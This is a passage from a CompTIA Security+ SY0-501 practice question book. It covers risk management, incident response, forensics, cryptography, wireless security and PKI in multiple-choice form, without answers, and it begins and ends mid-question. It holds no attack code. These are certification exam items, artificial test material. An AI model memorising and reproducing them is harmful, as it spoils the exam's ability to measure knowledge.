A. Cold site
B. Warm site
C. Hot site
D. Differential site
5116150
5117â–
5118Risk Management
79. A security administrator is reviewing the company’s continuity plan, and it specifies an RTO of 4 hours and an RPO of 1 day. Which of the following is the plan describing?
A. Systems should be restored within 1 day and should remain operational for at least 4 hours.
B. Systems should be restored within 4 hours and no later than 1 day after the incident.
C. Systems should be restored within 1 day and lose, at most, 4 hours’ worth of data.
D. Systems should be restored within 4 hours with a loss of 1 day’s worth of data at most.
80. Which of the following statements is true regarding a data retention policy?
A. Regulations require financial transactions to be stored for 7 years.
B. Employees must remove and lock up all sensitive and confidential documents when not in use.
C. It describes a formal process of managing configuration changes made to a network.
D. It is a legal document that describes a mutual agreement between parties.
81. You are attending a meeting with your manager and he wants to validate the cost of a warm site versus a cold site. Which of the following reasons best justify the cost of a warm site? (Choose two.)
A. Small amount of income loss during long downtime
B. Large amount of income loss during short downtime
C. Business contracts enduring no more than 72 hours of downtime
D. Business contracts enduring no more than 8 hours of downtime
82. Recently, company data that was sent over the Internet was intercepted and read by hackers. This damaged the company’s reputation with its customers. You have been asked to implement a policy that will protect against these attacks. Which of the following options would you choose to help protect data that is sent over the Internet? (Choose two.)
A. Confidentiality
B. Safety
C. Availability
D. Integrity
83. How do you calculate the annual loss expectancy (ALE) that may occur due to a threat?
A. Exposure Factor (EF) / Single Loss Expectancy (SLE)
B. Single Loss Expectancy (SLE) × Annual Rate of Occurrence (ARO)
C. Asset Value (AV) × Exposure Factor (EF)
D. Single Loss Expectancy (SLE) / Exposure Factor (EF)
84. Which of the following impact scenarios would include severe weather events? (Choose two.)
A. Life
B. Reputation
C. Salary
D. Property
85. Which of the following outlines a business goal for system restoration and allowable data loss?
A. RPO
B. Single point of failure
C. MTTR
D. MTBF
86. Which of the following are examples of preventive controls? (Choose two.)
A. Data backups
B. Security camera
C. Door alarm
D. Cable locks
87. You are a security administrator for your company and you identify a security risk that you do not have in-house skills to address. You decide to acquire contract resources. The contractor will be responsible for handling and managing this security risk. Which of the following types of risk response technique are you demonstrating?
A. Accept
B. Mitigate
C. Transfer
D. Avoid
88. You are an IT manager and discovered your department had a break-in, and the company’s computers were physically damaged. What type of impact best describes this situation?
A. Life
B. Reputation
C. Property
D. Safety
89. Which of the following would help build informed decisions regarding a specific DRP?
A. Business impact analysis
B. ROI analysis
C. RTO
D. Life impact
90. Each salesperson who travels has a cable lock to lock down their laptop when they step away from the device. Which of the following controls does this apply to?
A. Administrative
B. Compensating
C. Deterrent
D. Preventive
91. Which of the following secures access to company data in agreement with management policies?
A. Technical controls
B. Administrative controls
C. HTTPS
D. Integrity
92. You are a server administrator for your company’s private cloud. To provide service to employees, you are instructed to use reliable hard disks in the server to host a virtual environment. Which of the following best describes the reliability of hard drives?
A. MTTR
B. RPO
C. MTBF
D. ALE
93. You are replacing a number of devices with a mobile appliance that combines several functions. Which of the following describes the new implementation?
A. Cloud computing
B. Load balancing
C. Single point of failure
D. Virtualization
94. Which of the following can help mitigate adware intrusions?
A. Antivirus
B. Antispam
C. Spyware
D. Pop-up blocker
95. In the initial stages of a forensics investigation, Zack, a security administrator, was given the hard drive of the compromised workstation by the incident manager. Which of the following data acquisition procedures would Zack need to perform in order to begin the analysis? (Choose two.)
A. Take hashes
B. Take screenshots
C. Capture the system image
D. Start the order of volatility
96. Which of the following best describes a Computer Incident Response Team (CIRT)?
A. Personnel who participate in exercises to practice incident response procedures
B. Personnel who promptly and correctly handle incidents so they can be quickly contained, investigated, and recovered from
C. A team to identify planning flaws before an actual incident occurs
D. Team members using a walk-through checklist to ensure understanding of roles in a DRP
97. Which of the following decreases the success of brute-force attacks?
A. Password complexity
B. Password hints
C. Account lockout threshold
D. Enforce password history
98. A warrant has been issued to investigate a file server that is suspected to be part of an organized crime operation to steal credit card information. You are instructed to follow the order of volatility. Which data would you collect first?
A. RAM
B. USB flash drive
C. Hard disk
D. Swap files
99. What should human resources personnel be trained in regarding security policies?
A. Guidelines and enforcement
B. Order of volatility
C. Penetration assessment
D. Vulnerability assessment
100. Which of the following is not a basic concept of computer forensics?
A. Preserve evidence
B. Determine if the suspect is guilty based on the findings
C. Track man-hours and expenses
D. Interview all witnesses
101. The Chief Information Officer (CIO) wants to set up a redundant server location so that the production server images can be moved within 36 hours and the servers can be restored quickly, should a catastrophic failure occur at the primary location. Which of the following can be implemented?
A. Hot site
B. Cold site
C. Warm site
D. Load balancing
102. Choose the correct order of volatility when collecting digital evidence.
A. Hard disk drive, DVD-R, RAM, swap file
B. Swap file, RAM, DVD-R, hard disk drive
C. RAM, DVD-R, swap file, hard disk drive
D. RAM, swap file, hard disk drive, DVD-R
103. Which of the following pieces of information would be summarized in the lessons learned phase of the incident response process? (Choose three.)
A. When the problem was first detected and by whom
B. How the problem was contained and eradicated
C. The work that was performed during the recovery
D. Preparing a company’s team to be ready to handle an incident at a moment’s notice
104. You receive a phone call from an employee reporting that their workstation is acting strangely. You gather information from the intrusion detection system and notice unusual network traffic from the workstation, and you determine the event may be an incident. You report the event to your manager, who then begins to collect evidence and prepare for the next steps. Which phase of the incident response process is this?
A. Preparation
B. Identification
C. Containment
D. Eradication
105. Your manager has asked you to recommend a way to transmit PII via email and maintain its confidentiality. Which of the following options is the best solution?
A. Hash the information before sending.
B. Protect the information with a digital signature.
C. Protect the information by using RAID.
D. Encrypt the information before sending.
106. Which of the following statements best defines change management?
A. Responding to, containing, analyzing, and recovering from a computer-related incident
B. Means used to define which access permissions subjects have for a specific object
C. Procedures followed when configuration changes are made to a network
D. Categorizing threats and vulnerabilities and their potential impacts to a network
107. During which step of the incident response process does identification of incidents that can be prevented or mitigated occur?
A. Containment
B. Eradication
C. Preparation
D. Lessons learned
108. Which of the following best describes the disadvantages of quantitative risk analysis compared to qualitative risk analysis? (Choose two.)
A. Quantitative risk analysis requires complex calculations.
B. Quantitative risk analysis is sometimes subjective.
C. Quantitative risk analysis is generally scenario-based.
D. Quantitative risk analysis is more time-consuming than qualitative risk analysis.
109. Which of the following are disadvantages of using a cold site? (Choose two.)
A. Expense
B. Recovery time
C. Testing availability
D. Administration time
110. Which of the following policies should be implemented to minimize data loss or theft?
A. Password policy
B. PII handling
C. Chain of custody
D. Detective control
111. Which of the following should a comprehensive data policy include?
A. Wiping, disposing, storage, retention
B. Disposing, patching, storage, retention
C. Storage, retention, virtualization
D. Onboarding, storage, disposing
112. You have discovered a recent intrusion within the company’s network and have decided to execute incident response procedures. The incident response team has identified audit logs that hold information about the recent security breach. Prior to the incident, a security consulting firm recommended that your company install an NTP server within the network. Which of the following is a setback the incident response team will likely encounter during the assessment?
A. Order of volatility
B. Chain of custody
C. Eradication
D. Record time offset
113. You plan to provide a word processing program to the employees in your company. You decide not to install the program on each employee’s workstation but rather have a cloud service provider host the application. Which of the following risk response techniques best describes the situation?
A. Risk mitigation
B. Risk acceptance
C. Risk avoidance
D. Risk transfer
114. Which of the following statements is true about incremental backup?
A. It backs up all files.
B. It backs up all files in a compressed format.
C. It backs up all new files and any files that have changed since the last full backup without resetting the archive bit.
D. It backs up all new files and any files that have changed since the last full or incremental backup and resets the archive bit.
115. The chief security officer (CSO) has seen four security breaches during the past 2 years. Each breach cost the company $30,000, and a third-party vendor has offered to repair the security weakness in the system for $250,000. The breached system is set to be replaced in 5 years. Which of the following risk response techniques should the CSO use?
A. Accept the risk.
B. Transfer the risk.
C. Avoid the risk.
D. Mitigate the risk.
116. Which of the following would not be a guideline for performing a BIA?
A. Identify impact scenarios that put your business operations at risk.
B. Identify mission-essential functions and the critical systems within each function.
C. Approve and execute changes in order to ensure maximum security and availability of IT services.
D. Calculate RPO, RTO, MTTR, and MTBF.
117. You are a network administrator and have purchased two devices that will work as failovers for each other. Which of the following does this best demonstrate?
A. Integrity
B. Availability
C. Authentication
D. Confidentiality
118. Your company has lost power and the salespeople cannot take orders because the computers and phone systems are unavailable. Which of the following would be the best options for an alternate business practice? (Choose two.)
A. Tell the salespeople to go home for the day until the power is restored.
B. Tell the salespeople to use their cell phones until the power is restored.
C. Have the salespeople use paper and pen to take orders until the power is restored.
D. Have the salespeople instruct customers to fax their orders until the power is restored.
119. Leigh Ann is the new network administrator for a local community bank. She studies the current file server folder structures and permissions. The previous administrator didn’t properly secure customer documents in the folders. Leigh Ann assigns appropriate file and folder permissions to be sure that only the authorized employees can access the data. What security role is Leigh Ann assuming?
A. Power user
B. Data owner
C. User
D. Custodian
120. Which of the following methods is not recommended for removing data from storage media that is used to store confidential information?
A. Formatting
B. Shredding
C. Wiping
D. Degaussing
121. A SQL database server is scheduled for full backups on Sundays at 2:00 a.m. and incremental backups each weeknight at 11:00 p.m. Write verification is enabled, and backup tapes are stored off-site at a bank safety deposit box. Which of the following should be completed to ensure integrity and confidentiality of the backups? (Choose two.)
A. Use SSL to encrypt the backup data.
B. Encrypt the backup data before it is stored off-site.
C. Ensure that an employee other than the backup operator analyzes each day’s backup logs.
D. Ensure that the employee performing the backup is a member of the administrators’ group.
122. You are planning to perform a security audit and would like to see what type of network traffic is transmitting within your company’s network. Which of the following tools would you use?
A. Port scanner
B. Vulnerability scanner
C. Protocol analyzer
D. Network intrusion detection system
123. Your company has hired a new administrative assistant to a commercial lender named Leigh Ann. She will be using a web browser on a company computer at the office to access internal documents on a public cloud provider over the Internet. Which type of document should Leigh Ann read and sign?
A. Internet acceptable use policy
B. Audit policy
C. Password policy
D. Privacy policy
124. During a conversation with another colleague, you suggest there is a single point of failure in the single load balancer in place for the company’s SQL server. You suggest implementing two load balancers in place with only one in service at a given time. What type of load balancing configuration have you described?
A. Active-active
B. Active directory
C. Round robin
D. Active-passive
125. Which of the following policies would you implement to help prevent the company’s users from revealing their login credentials for others to view?
A. Job rotation
B. Data owner
C. Clean desk
D. Separation of duties
126. Which of the following are part of the chain of custody?
A. Delegating evidence collection to your manager
B. Capturing the system image to another hard drive
C. Capturing memory contents before capturing hard disk contents
D. Preserving, protecting, and documenting evidence
127. Zackary has been assigned the task of performing a penetration test on a server and was given limited information about the inner workings of the server. Which of the following tests will he be performing?
A. White box
B. Gray box
C. Black box
D. Clear box
128. Which of the following are considered administrative controls? (Choose two.)
A. Firewall rules
B. Personnel hiring policy
C. Separation of duties
D. Intrusion prevention system
129. Which of the following are examples of alternate business practices? (Choose two.)
A. The business’s point-of-sale terminal goes down, and employees use pen and paper to take orders and a calculator to determine customers’ bills.
B. The network system crashes due to an update, and employees are told to take time off until the company’s network system is restored.
C. Power is lost at a company’s site and the manager posts a closed sign until power is restored.
D. A bank location has lost power, and the employees are sent to another location to resume business.
130. Which of the following require careful handling and special policies for data retention and distribution? (Choose two.)
A. Personal electronic devices
B. MOU
C. PII
D. NDA
131. Matt is the head of IT security for a university department. He recently read articles about security breaches that involved malware on USB removable devices and is concerned about future incidents within the university. Matt reviews the past incident responses to determine how these occurrences may be prevented and how to improve the past responses. What type of document should Matt prepare?
A. MOU
B. SLA
C. After-action report
D. Nondisclosure agreement
132. Categorizing residual risk is most important to which of the following risk response techniques?
A. Risk mitigation
B. Risk acceptance
C. Risk avoidance
D. Risk transfer
133. You are the IT manager and one of your employees asks who assigns data labels. Which of the following assigns data labels?
A. Owner
B. Custodian
C. Privacy officer
D. System administrator
134. Which of the following is the most pressing security concern related to social media networks?
A. Other users can view your MAC address.
B. Other users can view your IP address.
C. Employees can leak a company’s confidential information.
D. Employees can express their opinion about their company.
135. You are a network administrator looking to test patches quickly and often before pushing them out to the production workstations. Which of the following would be the best way to do this?
A. Create a full disk image to restore the system after each patch installation.
B. Create a virtual machine and utilize snapshots.
C. Create an incremental backup of an unpatched workstation.
D. Create a differential backup of an unpatched workstation.
136. You have instructed your junior network administrator to test the integrity of the company’s backed-up data. Which of the following is the best way to test the integrity of a backup?
A. Review written procedures.
B. Use software to recover deleted files.
C. Restore part of the backup.
D. Conduct another backup.
137. What concept is being used when user accounts are created by one employee and user permissions are configured by another employee?
A. Background checks
B. Job rotation
C. Separation of duties
D. Collusion
138. Your company is requesting the installation of a fence around the property and cipher locks on all front entrances. Which of the following concepts is your company concerned about?
A. Confidentiality
B. Integrity
C. Availability
D. Safety
139. Which of the following is an example of a vulnerability assessment tool?
A. Ophcrack
B. John the Ripper
C. L0phtCrack
D. Nessus
140. A security analyst is analyzing the cost the company could incur if the customer database was breached. The database contains 2,500 records with PII. Studies show the cost per record would be $300. The likelihood that the database would be breached in the next year is only 5%. Which of the following would be the ALE for a security breach?
A. $15,000
B. $37,500
C. $150,000
D. $750,000
141. Your team must perform a test of a specific system to be sure the system operates at the alternate site. The results of the test must be compared with the company’s live environment. Which test is your team performing?
A. Cutover test
B. Walk-through
C. Parallel test
D. Simulation
142. Which of the following concepts defines a company goal for system restoration and acceptable data loss?
A. MTBF
B. MTTR
C. RPO
D. ARO
143. Your IT team has created a disaster recovery plan to be used in case a SQL database server fails. What type of control is this?
A. Detective
B. Corrective
C. Preventive
D. Deterrent
144. Which of the following is not a step in the incident response process?
A. Snapshot
B. Preparation
C. Recovery
D. Containment
145. Which of the following threats is mitigated by shredding paper documents?
A. Shoulder surfing
B. Physical
C. Adware
D. Spyware
146. Your company hires a third-party auditor to analyze the company’s data backup and long-term archiving policy. Which type of organization document should you provide to the auditor?
A. Clean desk policy
B. Acceptable use policy
C. Security policy
D. Data retention policy
147. You are a network administrator and have been given the duty of creating user accounts for new employees the company has hired. These employees are added to the identity and access management system and assigned mobile devices. What process are you performing?
A. Offboarding
B. System owner
C. Onboarding
D. Executive user
148. Which of the following defines a standard operating procedure (SOP)? (Choose three.)
A. Standard
B. Privacy
C. Procedure
D. Guideline
149. Computer equipment was suspected to be involved in a computer crime and was seized. The computer equipment was left unattended in a corridor for 10 minutes while officers restrained a potential suspect. The seized equipment is no longer admissible as evidence because of which of the following violations?
A. Chain of custody
B. Order of volatility
C. Preparation
D. Eradication
150. Which of the following should be performed when conducting a qualitative risk analysis? (Choose two.)
A. ARO
B. SLE
C. Asset estimation
D. Rating potential threats

Chapter 6
Cryptography and PKI
The CompTIA Security+ Exam SY0-501 topics covered in this chapter include the following:
✓ 6.1 Compare and contrast basic concepts of cryptography.
■ Symmetric algorithms
■ Modes of operation
■ Asymmetric algorithms
■ Hashing
■ Salt, IV, nonce
■ Elliptic curve
■ Weak/deprecated algorithms
■ Key exchange
■ Digital signatures
■ Diffusion
■ Confusion
■ Collision
■ Steganography
■ Obfuscation
■ Stream vs. block
■ Key strength
■ Session keys
■ Ephemeral key
■ Secret algorithm
■ Data-in-transit
■ Data-at-rest
■ Data-in-use
■ Random/pseudo-random number generation
■ Key stretching
■ Implementation vs. algorithm selection
■ Crypto service provider
■ Crypto modules
■ Perfect forward secrecy
■ Security through obscurity
■ Common use cases
■ Low power devices
■ Low latency
■ High resiliency
■ Supporting confidentiality
■ Supporting integrity
■ Supporting obfuscation
■ Supporting authentication
■ Supporting non-repudiation
■ Resource vs. security constraints
✓ 6.2 Explain cryptography algorithms and their basic characteristics.
■ Symmetric algorithms
  ■ AES
  ■ DES
  ■ 3DES
  ■ RC4
  ■ Blowfish/Twofish
■ Cipher modes
  ■ CBC
  ■ GCM
  ■ ECB
  ■ CTM
  ■ Stream vs. block
■ Asymmetric algorithms
  ■ RSA
  ■ DSA
  ■ Diffie-Hellman
  ■ Groups
  ■ DHE
  ■ ECDHE
  ■ Elliptic curve
  ■ PGP/GPG
■ Hashing algorithms
  ■ MD5
  ■ SHA
  ■ HMAC
  ■ RIPEMD
■ Key stretching algorithms
  ■ BCRYPT
  ■ PBKDF2
■ Obfuscation
  ■ XOR
  ■ ROT13
  ■ Substitution ciphers
✓ 6.3 Given a scenario, install and configure wireless security settings.
■ Cryptographic protocols
  ■ WPA
  ■ WPA2
  ■ CCMP
  ■ TKIP
■ Authentication protocols
  ■ EAP
  ■ PEAP
  ■ EAP-FAST
  ■ EAP-TLS
  ■ EAP-TTLS
  ■ IEEE 802.1x
  ■ RADIUS Federation
■ Methods
  ■ PSK vs. Enterprise vs. Open
  ■ WPS
  ■ Captive portals
✓ 6.4 Given a scenario, implement public key infrastructure.
■ Components
  ■ CA
  ■ Intermediate CA
  ■ CRL
  ■ OCSP
  ■ CSR
  ■ Certificate
  ■ Public key
  ■ Private key
  ■ Object identifiers (OID)
■ Concepts
  ■ Online vs. offline CA
  ■ Stapling
  ■ Pinning
  ■ Trust model
  ■ Key escrow
  ■ Certificate chaining
■ Types of certificates
  ■ Wildcard
  ■ SAN
  ■ Code signing
  ■ Self-signed
  ■ Machine/computer
  ■ Email
  ■ User
  ■ Root
  ■ Domain validation
  ■ Extended validation
■ Certificate formats
  ■ DER
  ■ PEM
  ■ PFX
  ■ CER
  ■ P12
  ■ P7B
1. Which of the following would a public key be used for?
A. To decrypt a hash of a digital signature
B. To encrypt TLS traffic
C. To digitally sign messages
D. To decrypt TLS messages
2. Your company’s web server certificate has been revoked and external customers are receiving errors when they connect to the website. Which of the following actions must you take?
A. Renew the certificate.
B. Create and use a self-signed certificate.
C. Request a certificate from the key escrow.
D. Generate a new key pair and new certificate.
3. Mary is concerned about the validity of an email because a coworker denies sending it. How can Mary prove the authenticity of the email?
A. Symmetric algorithm
B. Digital signature
C. CRL
D. Asymmetric algorithm
4. Wi-Fi Alliance recommends that a passphrase be how many characters in length for WPA2-Personal security?
A. 6 characters
B. 8 characters
C. 12 characters
D. 16 characters
5. Which of the following digital certificate management practices will ensure that a lost certificate is not compromised?
A. CRL
B. Key escrow
C. Nonrepudiation
D. Recovery agent
6. Which of the following are restricted to 64-bit block sizes? (Choose two.)
A. DES
B. SHA
C. MD5
D. 3DES
7. Your company has implemented a RADIUS server and has clients that are capable of using multiple EAP types, including one configured for use on the RADIUS server. Your security manager wants to implement a WPA2-Enterprise system. Since you have the RADIUS server and clients, what piece of the network would you need?
A. Network access control
B. Authentication server
C. Authenticator
D. Supplicant
8. You are given the task of selecting an asymmetric encryption type that has an appropriate level of encryption strength but uses a smaller key length than is typically required. Which of the following encryption methods will accomplish your requirement?
A. Blowfish
B. RSA
C. DHE
D. ECC
9. Matt has been told that successful attacks have been taking place and data that has been encrypted by his company’s software system has leaked to the company’s competitors. Matt, through investigation, has discovered patterns due to the lack of randomness in the seeding values used by the encryption algorithm in the company’s software. This discovery has led to successful reverse engineering. What can the company use to ensure patterns are not created during the encryption process?
A. One-time pad
B. Initialization vector
C. Stream cipher
D. Block cipher
10. You are asked to configure a WLAN that does not require a user to provide any credentials to associate with a wireless AP and access a WLAN. What type of authentication is said to be in use?
A. IV
B. WEP
C. WPA
D. Open
11. The CIO at your company no longer wants to use asymmetric algorithms because of the cost. Of the following algorithms, which should the CIO discontinue using?
A. AES
B. RC4
C. RSA
D. Twofish
12. Which of the following would you use to verify certificate status by receiving a response of “good,” “revoked,” or “unknown”?
A. CRL
B. OCSP
C. RA
D. PKI
13. Which of the following symmetric key algorithms are block ciphers? (Choose two.)
A. MD5
B. 3DES
C. RC4
D. Blowfish
14. Which of the following encryption algorithms is the weakest?
A. Blowfish
B. AES
C. DES
D. SHA
15. What encryption protocol does WEP improperly use?
A. RC6
B. RC4
C. AES
D. DES
16. James, an IT manager, expresses a concern during a monthly meeting about weak user passwords used on company servers and how they may be susceptible to brute-force password attacks. Which concept can James implement to make the weak passwords stronger?
A. Key stretching
B. Key escrow
C. Key strength
D. ECC
17. You are installing a network for a small business named Matrix Interior Design that the owner is operating out of their home. There are only four devices that will use the wireless LAN, and you are installing a SOHO wireless router between the wireless LAN clients and the broadband connection. To ensure better security from outside threats connecting to the wireless SOHO router, which of the following would be a good choice for the WPA2-PSK passphrase?
A. 123456
B. XXrcERr6Euex9pRCdn3h3
C. bRtlBv
D. HomeBusiness
18. You set up your wireless SOHO router to encrypt wireless traffic, and you configure the router to require wireless clients to authenticate against a RADIUS server. What type of security have you configured?
A. WPA2 Enterprise
B. WPA2 Personal
C. TKIP
D. WEP
19. You must implement a cryptography system that applies encryption to a group of data at a time. Which of the following would you choose?
A. Stream
B. Block
C. Asymmetric
D. Symmetric
20. Which symmetric block cipher supersedes Blowfish?
A. RSA
B. Twofish
C. MD5
D. PBKDF2
21. Root CAs can delegate their authority to which of the following to issue certificates to users?
A. Registered authorities
B. Intermediate CAs
C. CRL
D. CSR
22. Which of the following protocols should be used to authenticate remote access users with smartcards?
A. PEAP
B. EAP-TLS
C. CHAP
D. MS-CHAPv2
23. Tom is sending Mary a document and wants to show the document came from him. Which of the following should Tom use to digitally sign the document?
A. TKIP
B. Intermediate CA
C. Public key
D. Private key
24. Which of the following EAP types offers support for legacy authentication protocols such as PAP, CHAP, MS-CHAP, or MS-CHAPv2?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
25. You are conducting a training program for new network administrators for your company. You talk about the benefits of asymmetric encryption. Which of the following are considered asymmetric algorithms? (Choose two.)
A. RC4
B. DES
C. RSA
D. ECC
26. Which of the following is a form of encryption also known as ROT13?
A. Substitution cipher
B. Transposition cipher
C. Diffusion
D. Confusion
27. Matt needs to calculate the number of keys that must be generated for 480 employees using the company’s PKI asymmetric algorithm. How many keys must Matt create?
A. 114,960
B. 480
C. 960
D. 229,920
28. You are conducting a one-time electronic transaction with another company. The transaction needs to be encrypted, and for efficiency and simplicity, you want to use a single key for encryption and decryption of the data. Which of the following types would you use?
A. Asymmetric
B. Symmetric
C. Hashing
D. Steganography
29. Which of the following uses two mathematically related keys to secure data during transmission?
A. Twofish
B. 3DES
C. RC4
D. RSA
30. You have been instructed by the security manager to protect the server’s data-at-rest. Which of the following would provide the strongest protection?
A. Implement a full-disk encryption system.
B. Implement biometric controls on data entry points.
C. Implement a host-based intrusion detection system.
D. Implement a host-based intrusion prevention system.
31. Which of the following EAP types use a three-phase operation?
A. EAP-FAST
B. EAP-TLS
C. EAP-TTLS
D. PEAP
32. Which of the following is an encryption standard that uses a single 56-bit symmetric key?
A. DES
B. 3DES
C. AES
D. WPS
33. Which of the following cryptography concepts converts output data into a fixed-length value and cannot be reversed?
A. Steganography
B. Hashing
C. Collision
D. IV
34. SSL is a protocol used for securing transactions transmitted over an untrusted network such as the Internet. Which of the following best describes the action that occurs during the SSL connection setup process?
A. The client creates a session key and encrypts it with the server’s private key.
B. The client creates a session key and encrypts it with the server’s public key.
C. The server creates a session key and encrypts it with the client’s private key.
D. The server creates a session key and encrypts it with the client’s public key.
35. Which of the following EAP types requires both server and client certificates?
A. EAP-FAST
B. PEAP
C. EAP-TLS
D. EAP-TTLS
36. You are the network administrator for a small office of 35 users and need to utilize mail encryption that will allow specific users to encrypt outgoing email messages. You are looking for an inexpensive onsite encryption server. Which of the following would you implement?
A. PGP/GPG
B. WPA2
C. CRL
D. EAP-TLS
37. You have been promoted to security administrator for your company and you need to be aware of all types of hashing algorithms for integrity checks. Which algorithm offers a 160-bit digest?
A. MD5
B. RC4
C. SHA-1
D. AES
38. You are the security manager for your company, and a system administrator wants to know if there is a way to reduce the cost of certificates by purchasing a certificate to cover all domains and subdomains for the company. Which of the following solutions would you offer?
A. Wildcards
B. Object identifiers
C. Key escrow
D. OCSP
39. Which of the following are authentication protocols? (Choose two.)
A. WPS
B. EAP
C. IPSec
D. IEEE 802.1x
40. Your company is looking to accept electronic orders from a vendor and wants to ensure nonauthorized people cannot send orders. Your manager wants a solution that provides nonrepudiation. Which of the following options would meet the requirements?
A. Digital signatures
B. Hashes
C. Steganography
D. Perfect forward secrecy
41. You are tasked to implement a solution to ensure data that are stored on a removable USB drive hasn’t been tampered with. Which of the following would you implement?
A. Key escrow
B. File backup
C. File encryption
D. File hashing
42. Which of the following is mainly used for remote access into a network?
A. TACACS+
B. XTACACS
C. Kerberos
D. RADIUS
43. A security manager has asked you to explain why encryption is important and what symmetric encryption offers. Which of the following is the best explanation?
A. Confidentiality
B. Nonrepudiation
C. Steganography
D. Collision
44. You are a security administrator and have discovered one of the employees has been encoding confidential information into graphic files. Your employee is sharing these pictures on their social media account. What concept was the employee using?
A. Hashing
B. Steganography
C. Symmetric algorithm
D. Asymmetric algorithm
45. Your company’s branch offices connect to the main office through a VPN. You recently discovered the key used on the VPN has been compromised. What should you do to ensure the key isn’t compromised in the future?
A. Enable perfect forward secrecy at the main office and branch office ends of the VPN.
B. Enable perfect forward secrecy at the main office end of the VPN.
C. Enable perfect forward secrecy at the branch office end of the VPN.
D. Disable perfect forward secrecy at the main office and branch office ends of the VPN.
46. You are configuring your friend’s new wireless SOHO router and discover a PIN on the back of the router. Which of the following best describes the purpose of the PIN?
A. This is a WEP PIN.
B. This is a WPS PIN.
C. This is a WPA PIN.
D. This is a Bluetooth PIN.
47. Which of the following benefits do digital signatures provide? (Choose two.)
A. Nonrepudiation
B. Authentication
C. Encryption
D. Key exchange
48. Your company has asked you to recommend a secure method for password storage. Which of the following would provide the best protection against brute-force attacks? (Choose two.)
A. ROT13
B. MD5
C. PBKDF2
D. BCRYPT
49. Your IT support center is receiving a high number of calls stating that users trying to access the company’s website are receiving certificate errors within their browsers. Which of the following statements best describes what the issue is?
A. The website certificate has expired.
B. Users have forgotten their usernames or passwords.
C. The domain name has expired.
D. The network is currently unavailable.
50. In asymmetric encryption, what is used to decrypt an encrypted file?
A. Private key
B. Public key
C. Message digest
D. Ciphertext
51. You are performing a vulnerability assessment on a company’s LAN and determine they are using 802.1x for secure access. Which of the following attacks can a threat actor use to bypass the network security?
A. MAC spoofing
B. ARP poisoning
C. Ping of death
D. Xmas attack
52. Your security manager is looking to implement a one-time pad scheme for the company’s salespeople to use when traveling. Which of the following best describes a requirement for this implementation? (Choose three.)
A. The pad must be distributed securely and protected at its destination.
B. The pad must always be the same length.
C. The pad must be used only one time.
D. The pad must be made up of truly random values.
53. A threat actor has created a man-in-the-middle attack and captured encrypted communication between two users. The threat actor was unable to decrypt the messages. Which of the following is the reason the threat actor is unable to decrypt the messages?
A. Hashing
B. Symmetric encryption
C. Asymmetric encryption
D. Key escrow
54. You have implemented a PKI to send signed and encrypted data. The user sending data must have which of the following? (Choose two.)
A. The receiver’s private key
B. The sender’s private key
C. The sender’s public key
D. The receiver’s public key
55. Which of the following best describes the drawback of symmetric key systems?
A. You must use different keys for encryption and decryption.
B. The algorithm is more complex.
C. The system works much more slowly than an asymmetric system.
D. The key must be delivered in a secure manner.
56. Your company is looking for a secure backup mechanism for key storage in a PKI. Which of the following would you recommend?
A. CSR
B. Key escrow
C. CRL
D. CA
57. Which cryptography concept uses points on a curve to define public and private key pairs?
A. Obfuscation
B. ECC
C. Stream cipher
D. Block cipher
58. You are a security administrator and have been given instructions to update the access points to provide a more secure connection. The access points are currently set to use WPA TKIP for encryption. Which of the following would you configure to accomplish the task of providing a more secure connection?
A. WEP
B. WPA2 CCMP
C. Enable MAC filtering
D. Disable SSID broadcast
59. Which of the following is an example of a stream cipher?
A. AES
B. DES
C. 3DES
D. RC4
60. Which of the following are negotiation protocols commonly used by TLS? (Choose two.)
A. DHE
B. ECDHE
C. RSA
D. SHA
61. Which of the following statements is true regarding symmetric key systems?
A. They use different keys on each end of the transported data.
B. They use public key cryptography.
C. They use multiple keys for creating digital signatures.
D. They use the same key on each end of the transported data.
62. Which of the following ciphers was created from the foundation of the Rijndael algorithm?
A. TKIP
B. AES
C. DES
D. 3DES
63. Katelyn is sending an important email to Zackary, the manager of human resources. Company policy states messages to human resources must be digitally signed. Which of the following statements is correct?
A. Katelyn’s public key is used to verify the digital signature.
B. Katelyn’s private key is used to verify the digital signature.
C. Zackary’s public key is used to verify the digital signature.
D. Zackary’s private key is used to verify the digital signature.
64. Data integrity is provided by which of the following?
A. 3DES
B. MD5
C. AES
D. Blowfish
65. Which of the following is a symmetric encryption algorithm that is available in 128-bit, 192-bit, and 256-bit key versions?
A. AES
B. DES
C. RSA
D. TKIP
66. Which of the following items are found within a digital certificate? (Choose two.)
A. Serial number
B. Default gateway
C. Public key
D. Session key
67. In an 802.1x implementation, which of the following devices mutually authenticate with each other? (Choose two.)
A. Authentication server
B. Certificate authority
C. Domain controller
D. Supplicant
68. Which of the following statements is true regarding the confusion encryption method?
A. It puts one item in the place of another; for example, one letter for another or one letter for a number.
B. It scrambles data by reordering the plain text in a certain way.
C. It uses a relationship between the plain text and the key that is so complicated the plain text can’t be altered and the key can’t be determined.
D. Change in the plain text will result in multiple changes that are spread throughout the cipher text.
69. Which of the following is required when employing PKI and preserving data is important?
A. CA
B. CRL
C. Key escrow
D. CER
70. You need to encrypt the signature of an email within a PKI system. Which of the following would you use?
A. CER
B. Public key
C. Shared key
D. Private key
71. Which of the following standards was developed by the Wi-Fi Alliance and implements the requirements of IEEE 802.11i?
A. NIC
B. WPA
C. WPA2
D. TKIP
72. You are asked to create a wireless network for your company that implements a wireless protocol that provides maximum security while providing support for older wireless devices. Which protocol should you use?
A. WPA
B. WPA2
C. WEP
D. IV
73. Bob is a security administrator and needs to encrypt and authenticate messages that are sent and received between two systems. Which of the following would Bob choose to accomplish his task?
A. Diffie-Hellman
B. MD5
C. SHA-256
D. RSA
74. Which of the following algorithms is generally used in mobile devices?
A. 3DES
B. DES
C. ECC
D. AES
75. Which of the following statements best describes the difference between public key cryptography and public key infrastructure?
A. Public key cryptography is another name for an asymmetric algorithm, whereas public key infrastructure is another name for a symmetric algorithm.
B. Public key cryptography uses one key to encrypt and decrypt the data, and public key infrastructure uses two keys to encrypt and decrypt the data.
C. Public key cryptography is another name for asymmetric cryptography, whereas public key infrastructure contains the public key cryptographic mechanisms.
D. Public key cryptography provides authentication and nonrepudiation, whereas public key infrastructure provides confidentiality and integrity.
76. Your company has a public key infrastructure (PKI) in place to issue digital certificates to users. Recently, your company hired temporary contractors for a project that is now complete. Management has requested that all digital certificates issued to the contractors be revoked. Which PKI component would you consult for the management’s request?
A. CA
B. CRL
C. RA
D. CSR
77. Which of the following security setup modes are intended for use in a small office or home office environment? (Choose two.)
A. WPS
